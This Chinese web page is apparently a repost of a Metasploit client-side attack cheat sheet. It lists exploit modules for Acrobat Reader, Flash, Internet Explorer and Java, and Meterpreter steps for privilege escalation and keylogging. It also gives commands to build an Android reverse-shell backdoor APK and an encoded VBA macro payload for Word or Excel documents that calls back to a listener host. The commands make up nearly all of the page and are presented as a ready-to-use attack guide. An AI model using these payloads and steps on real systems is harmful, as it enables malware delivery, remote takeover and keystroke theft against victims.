MSF客户端渗透

  • 时间:2025-11-11 20:43 作者: 来源: 阅读:0
  • 扫一扫,手机访问
摘要:利用Acrobat Reader漏洞执行payload构造PDF文件exploit/windows/fileformat/adobe_utilprintf仅支持8.1.2软件版本和XP系统;构造恶意网站exploit/windows/browser/adobe_utilprintf #同理,浏览器上运行pDF之后可以通过Meterpreter进行下一步操作use priv #提权 run p

利用Acrobat Reader漏洞执行payload

  • 构造PDF文件
exploit/windows/fileformat/adobe_utilprintf

MSF客户端渗透

仅支持8.1.2软件版本和XP系统;

  • 构造恶意网站
exploit/windows/browser/adobe_utilprintf
  #同理,浏览器上运行pDF


  • 之后可以通过Meterpreter进行下一步操作
use priv  #提权
run post/windows/capture/keylog_recorder #键盘记录器


利用Flash插件漏洞执行payload

use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2


利用IE浏览器漏洞执行payload

use exploit/windows/browser/ms14_064_ole_code_execution

利用JRE漏洞执行payload

use exploit/multi/browser/java_jre17_driver_manager

MSF客户端渗透


use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types


生成Android后门程序

use payload/android/meterpreter/reverse_tcp
  generate -f raw -p android -o a.apk

MSF客户端渗透

MSF客户端渗透


VBScript感染方式

  • 利用宏感染word、excel文档
  • 绕过某些基于文件类型检查的安全机制
  • 生成vbscript脚本:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
  • Office 2007
    • 视图-宏-创建
    • Payload第一部分粘入VBA代码
    • Payload第二部分粘入word文档正文;
  • Msf启动侦听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
  • 全部评论(0)
最新发布的资讯信息
【系统环境|】最低 2 美元,这 55 款 macOS & Windows 应用一次全都入手(2025-11-11 22:01)
【系统环境|】SCI期刊对论文图片有哪些要求?(2025-11-11 22:00)
【系统环境|】论文缩写大全,拿走不谢(2025-11-11 22:00)
【系统环境|】阿甘正传高频词整理 GRE托福四六级词汇整理(2025-11-11 21:59)
【系统环境|】矢量图形编辑应用程序-WinFIG(2025-11-11 21:59)
【系统环境|】Figma上市首日暴涨250%的深层逻辑:为什么AI时代协作平台更加不可替代?(2025-11-11 21:58)
【系统环境|】FigJam是什么?一文读懂在线白板软件的方方面面!(2025-11-11 21:58)
【系统环境|】在windows上有什么好用的书写白板软件?(2025-11-11 21:57)
【系统环境|】Docker基础应用之nginx(2025-11-11 21:57)
【系统环境|】VS Code 新手必装插件清单(2025-11-11 21:56)
手机二维码手机访问领取大礼包
返回顶部